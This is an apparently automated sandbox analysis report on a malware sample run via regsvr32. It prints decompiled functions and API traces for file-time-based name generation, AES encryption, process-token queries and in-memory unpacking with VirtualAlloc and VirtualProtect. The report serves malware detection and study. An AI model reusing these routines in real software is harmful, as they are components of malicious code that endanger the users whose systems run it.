Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 6a472ea5824954c615931cd2c46e5b6675d0f2f16d40ccd9fae3876fc73ccd9e
Instruction ID: 5b0553e26eaecdcb4b2b7c5ae5fcf81067ae11264846c62f2a55e896b39e869f
Opcode Fuzzy Hash: 6a472ea5824954c615931cd2c46e5b6675d0f2f16d40ccd9fae3876fc73ccd9e
Instruction Fuzzy Hash: 76F0D478644249DBEB288F34EF6BF15B7A4AB89715B068019E806C7364C772BC00FA15

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2FFC, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00FC2FFC(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00FC5C4E(_t2);
				if(_t34 != 0) {
					_t30 = E00FC5C4E(_t28);
					if(_t30 == 0) {
						E00FC2A03(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00FC79AC(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00FC79AC(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00fc2ffc
0x00fc3006
0x00fc3008
0x00fc300e
0x00fc300e
0x00fc3017
0x00fc301b
0x00fc3027
0x00fc302b
0x00fc309f
0x00fc302d
0x00fc302d
0x00fc3031
0x00fc3038
0x00fc303b
0x00fc3055
0x00fc3044
0x00fc3044
0x00fc3048
0x00fc304b
0x00fc3050
0x00fc3050
0x00fc305a
0x00fc3082
0x00fc3088
0x00fc308b
0x00fc305c
0x00fc305e
0x00fc3066
0x00fc3071
0x00fc3076
0x00fc3076
0x00fc3092
0x00fc3099
0x00fc309a
0x00fc309a
0x00fc302b
0x00fc30aa

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00FC56E5,00000000,00000000,00000000,038F9698,?,?,00FC3B82,?,038F9698), ref: 00FC3008

Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A

Part of subcall function 00FC79AC: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00FC3036,00000000,00000001,00000001,?,?,00FC56E5,00000000,00000000,00000000,038F9698), ref: 00FC79BA
Part of subcall function 00FC79AC: StrChrA.SHLWAPI(?,0000003F,?,?,00FC56E5,00000000,00000000,00000000,038F9698,?,?,00FC3B82,?,038F9698,0000EA60,?), ref: 00FC79C4

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00FC56E5,00000000,00000000,00000000,038F9698,?,?,00FC3B82), ref: 00FC3066
lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3076
lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3082

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: a50163c47f0c1720bae4f119d7a897eba2df18b55f535ff1c932966da87f12e1
Instruction ID: 4e5411bbe5006cb5f42c33db32c54c6dd96819243f1ad1e02c90db825854a840
Opcode Fuzzy Hash: a50163c47f0c1720bae4f119d7a897eba2df18b55f535ff1c932966da87f12e1
Instruction Fuzzy Hash: D721D57390421AAFCB119F74CD46FAA7FB8AF06394B058058F8059B211D775DA00E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4DC8, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC4DC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00FC5C4E(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00fc4ddd
0x00fc4de1
0x00fc4deb
0x00fc4df2
0x00fc4df5
0x00fc4df7
0x00fc4dff
0x00fc4e04
0x00fc4e12
0x00fc4e17
0x00fc4e21

APIs

lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,038F932C,?,00FC4ABB,004F0053,038F932C,?,?,?,?,?,?,00FC1BD5), ref: 00FC4DD8
lstrlenW.KERNEL32(00FC4ABB,?,00FC4ABB,004F0053,038F932C,?,?,?,?,?,?,00FC1BD5), ref: 00FC4DDF

Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00FC4ABB,004F0053,038F932C,?,?,?,?,?,?,00FC1BD5), ref: 00FC4DFF
memcpy.NTDLL(73B769A0,00FC4ABB,00000002,00000000,004F0053,73B769A0,?,?,00FC4ABB,004F0053,038F932C), ref: 00FC4E12

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 36f72e47f50908cb145552aba2d2e558456f892e4c7eb3442af62aca21925df0
Instruction ID: 09f6b0077650b7eabf191ac5c153ce7cf66e20d9d4b00e2fe0d01a2b880fe0fc
Opcode Fuzzy Hash: 36f72e47f50908cb145552aba2d2e558456f892e4c7eb3442af62aca21925df0
Instruction Fuzzy Hash: 06F04F32900119BFCF11EFA8CD46D9E7BACEF083547014066FD04D7102E775EA149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2829, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(038F887A,00000000,00000000,00000000,00FC6328,00000000), ref: 00FC2839
lstrlen.KERNEL32(?), ref: 00FC2841

Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A

lstrcpy.KERNEL32(00000000,038F887A), ref: 00FC2855
lstrcat.KERNEL32(00000000,?), ref: 00FC2860

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 52d8b1bdf8ce5dc49a0ff19780856fee38270624bd9c966b4a49aa617ff6ebc1
Instruction ID: 19f3fe21342a05b29f2c1e70feef50e902108018a3d4edc4d87578fd930b5647
Opcode Fuzzy Hash: 52d8b1bdf8ce5dc49a0ff19780856fee38270624bd9c966b4a49aa617ff6ebc1
Instruction Fuzzy Hash: E2E09273905269A787119BB59D4DC9FBBACFF89761304041AFA00D3110C7659805ABA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 1576 Parent PID: 5692 regsvr32.exeCOMMON

Executed Functions

Function 00A74E9C, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00A74E9C(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xa7a2cc; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0xa7a290, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xa7a2cc; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0xa7a290, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xa7a290, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xa7a2cc; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0xa7a2d0; // 0x4aed5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xa7b825; // 0x73797325
				_t83 = E00A71000(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xa7a290, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xa7a2d0; // 0x4aed5a8
				_t16 = _t93 + 0xa7b846; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x00a74ea5
0x00a74eab
0x00a74ead
0x00a74ec7
0x00a74ecb
0x00a74ece
0x00a75143
0x00a7514a
0x00a7514a
0x00a74ed4
0x00a74ee9
0x00a74eeb
0x00a74eef
0x00a74ef2
0x00a75133
0x00a7513d
0x00000000
0x00a7513d
0x00a74ef8
0x00a74f03
0x00a74f08
0x00a74f0d
0x00a74f10
0x00a74f17
0x00a74f1e
0x00a74f21
0x00a75123
0x00a7512d
0x00000000
0x00a7512d
0x00a74f37
0x00a74f3b
0x00a74f3e
0x00a74f41
0x00a74f49
0x00a74f4c
0x00a74f55
0x00a74f5b
0x00a74f65
0x00a74f6c
0x00a74f6c
0x00a74f7e
0x00a74f89
0x00a74f97
0x00a74f9c
0x00a74fa1
0x00a74fa4
0x00a74fa9
0x00a74fb3
0x00a74fb6
0x00a74fb9
0x00a74fcf
0x00a74fd3
0x00a74fd6
0x00a75121
0x00000000
0x00a75121
0x00a74fed
0x00a7503e
0x00a75001
0x00a75009
0x00a7500e
0x00a7501c
0x00a75025
0x00a7502e
0x00a7502e
0x00a7503c
0x00a7503c
0x00a75042
0x00a75046
0x00a75046
0x00a7504c
0x00000000
0x00000000
0x00a7504e
0x00a75054
0x00a750fb
0x00a750fe
0x00a7510b
0x00a7510b
0x00a7510f
0x00000000
0x00000000
0x00a75104
0x00a75108
0x00a75108
0x00a7510a
0x00a7510a
0x00a75114
0x00a7511b
0x00a7511d
0x00000000
0x00a7511d
0x00a7505a
0x00a7505c
0x00a7505c
0x00a7506f
0x00a75075
0x00a75080
0x00a75082
0x00a75086
0x00a75088
0x00a75088
0x00a7508d
0x00a7508f
0x00a7508f
0x00a7508d
0x00a75094
0x00a75098
0x00a75098
0x00a750a8
0x00a750ad
0x00a750b0
0x00a750b0
0x00a750b3
0x00a750bd
0x00a750c5
0x00a750ca
0x00a750d8
0x00a750d8
0x00a750ec
0x00a750f0
0x00a750f0

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00A7A380), ref: 00A74EC7
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00A74EE9
memset.NTDLL ref: 00A74F03

Part of subcall function 00A71000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00A74F1C,73797325), ref: 00A71011
Part of subcall function 00A71000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A7102B

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00A74F41
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00A74F55
FindCloseChangeNotification.KERNELBASE(?), ref: 00A74F6C
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00A74F78
lstrcat.KERNEL32(?,642E2A5C), ref: 00A74FB9
FindFirstFileA.KERNELBASE(?,?), ref: 00A74FCF
CompareFileTime.KERNEL32(?,?), ref: 00A74FED
FindNextFileA.KERNELBASE(00A73EAC,?), ref: 00A75001
FindClose.KERNEL32(00A73EAC), ref: 00A7500E
FindFirstFileA.KERNEL32(?,?), ref: 00A7501A
CompareFileTime.KERNEL32(?,?), ref: 00A7503C
StrChrA.SHLWAPI(?,0000002E), ref: 00A7506F
memcpy.NTDLL(00A72779,?,00000000), ref: 00A750A8
FindNextFileA.KERNELBASE(00A73EAC,?), ref: 00A750BD
FindClose.KERNEL32(00A73EAC), ref: 00A750CA
FindFirstFileA.KERNEL32(?,?), ref: 00A750D6
CompareFileTime.KERNEL32(?,?), ref: 00A750E6
FindClose.KERNELBASE(00A73EAC), ref: 00A7511B
HeapFree.KERNEL32(00000000,00A72779,73797325), ref: 00A7512D
HeapFree.KERNEL32(00000000,?), ref: 00A7513D

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID:
API String ID: 2944988578-0
Opcode ID: def3983725bf338dd79e700728312c0fe88e3c534971f055540a881d4cac18a4
Instruction ID: 91cb4bfb81455feaa2dae54a4c9d8aa33f76c2f795880a819ce5e47031539375
Opcode Fuzzy Hash: def3983725bf338dd79e700728312c0fe88e3c534971f055540a881d4cac18a4
Instruction Fuzzy Hash: C0812C71D00119AFDF11DFA5DC84AEEBBB9FB48301F10816AE509E6160D7719E86CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A735A1, Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00A735A1(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0xa7a0b8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0xa7a0dc() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E00A75C4E(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0xa7a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0xa7a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E00A72A03(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x00a735aa
0x00a735b0
0x00a735b3
0x00a735b9
0x00a735b9
0x00a735bb
0x00a735bd
0x00a735c0
0x00a735c6
0x00a735c7
0x00a735c8
0x00a735ce
0x00a735d3
0x00a735d9
0x00a735e1
0x00a7373e
0x00a735e7
0x00a735e9
0x00a735f2
0x00a735f7
0x00a73609
0x00a7360c
0x00a73610
0x00a73617
0x00a7361b
0x00a73623
0x00a73729
0x00a73629
0x00a73629
0x00a7362d
0x00a7362e
0x00a73630
0x00a7363b
0x00a73715
0x00a73641
0x00a73641
0x00a73644
0x00a7364a
0x00a73650
0x00a73650
0x00a73658
0x00a7365c
0x00a7365f
0x00a73706
0x00a73665
0x00a7366b
0x00a7366e
0x00a73671
0x00a73673
0x00a73676
0x00a73679
0x00a7367b
0x00a7367b
0x00a73685
0x00a7368a
0x00a7368d
0x00a73690
0x00a73692
0x00a7369b
0x00a736c5
0x00a7369d
0x00a736ae
0x00a736ae
0x00a736cd
0x00000000
0x00000000
0x00a736cf
0x00a736d2
0x00a736d5
0x00a736d9
0x00000000
0x00a736db
0x00a736ea
0x00a736f0
0x00a736f8
0x00a736f8
0x00000000
0x00a736d9
0x00a736dd
0x00a736e5
0x00a736e8
0x00a736ff
0x00000000
0x00000000
0x00000000
0x00a736e8
0x00a7365f
0x00a73718
0x00a7371b
0x00a7371b
0x00a73730
0x00a73730
0x00a73748

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00A71B16,00000001,00A76301,00000000), ref: 00A735D9
memcpy.NTDLL(00A71B16,00A76301,00000010,?,?,?,00A71B16,00000001,00A76301,00000000,?,00A75B47,00000000,00A76301,?,00000000), ref: 00A735F2
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00A7361B
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00A73633
memcpy.NTDLL(00000000,00000000,05569630,00000010), ref: 00A73685
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05569630,00000020,?,?,00000010), ref: 00A736AE
GetLastError.KERNEL32(?,?,00000010), ref: 00A736DD
GetLastError.KERNEL32 ref: 00A7370F
CryptDestroyKey.ADVAPI32(00000000), ref: 00A7371B
GetLastError.KERNEL32 ref: 00A73723
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A73730
GetLastError.KERNEL32(?,?,?,00A71B16,00000001,00A76301,00000000,?,00A75B47,00000000,00A76301,?,00000000,00A76301,00000000,05569630), ref: 00A73738

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID:
API String ID: 3401600162-0
Opcode ID: 2158032d7c67638b5fae2c6bd5e4bbb51b7d7f04ec4c7585967131c7e2b7aab3
Instruction ID: 5ad6c17accb31e584679d794badb1a6dabf5556b2eaf77b21b10d147c9dda56c
Opcode Fuzzy Hash: 2158032d7c67638b5fae2c6bd5e4bbb51b7d7f04ec4c7585967131c7e2b7aab3
Instruction Fuzzy Hash: D6515CB2900208FFDF10DFA9DD84AAEBBB9EB44340F11C429F909E6250D7309E55AB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E09F906, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000814,00003000,00000040,00000814,6E09F360), ref: 6E09F9C3
VirtualAlloc.KERNEL32(00000000,000002B1,00003000,00000040,6E09F3BF), ref: 6E09F9FA
VirtualAlloc.KERNEL32(00000000,0000ED87,00003000,00000040), ref: 6E09FA5A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FA90
VirtualProtect.KERNEL32(6E050000,00000000,00000004,6E09F8E5), ref: 6E09FB95
VirtualProtect.KERNEL32(6E050000,00001000,00000004,6E09F8E5), ref: 6E09FBBC
VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5), ref: 6E09FC89
VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5,?), ref: 6E09FCDF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FCFB

Memory Dump Source

Source File: 00000002.00000002.1183150587.000000006E09F000.00000040.00020000.sdmp, Offset: 6E09F000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: e5aec10f1a0cb97d920a96a161caf5bd0c1cb3a6df24fb2d88acde02681facd5
Instruction ID: 82f0f9cb5b601b9f14a3f147ad8457523407e89c9735378e292c2c65c2a7f156
Opcode Fuzzy Hash: e5aec10f1a0cb97d920a96a161caf5bd0c1cb3a6df24fb2d88acde02681facd5
Instruction Fuzzy Hash: 44D19C766082819FDB50CF54E880B6177AAFF88350B290194ED1DDF35AD7B0A810FBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00A73CA1, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00A73CA1(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00A75C4E(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00A72A03(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00a73cae
0x00a73caf
0x00a73cb0
0x00a73cb1
0x00a73cb2
0x00a73cb6
0x00a73cbd
0x00a73ccc
0x00a73ccf
0x00a73cd2
0x00a73cd9
0x00a73cdc
0x00a73cdf
0x00a73ce2
0x00a73ce5
0x00a73cf0
0x00a73cf2
0x00a73cfb
0x00a73d03
0x00a73d05
0x00a73d17
0x00a73d21
0x00a73d25
0x00a73d34
0x00a73d38
0x00a73d41
0x00a73d49
0x00a73d49
0x00a73d4b
0x00a73d4b
0x00a73d53
0x00a73d59
0x00a73d5d
0x00a73d5d
0x00a73d68

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00A73CE8
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00A73CFB
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00A73D17

Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00A73D34
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00A73D41
NtClose.NTDLL(00000000), ref: 00A73D53
NtClose.NTDLL(00000000), ref: 00A73D5D

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

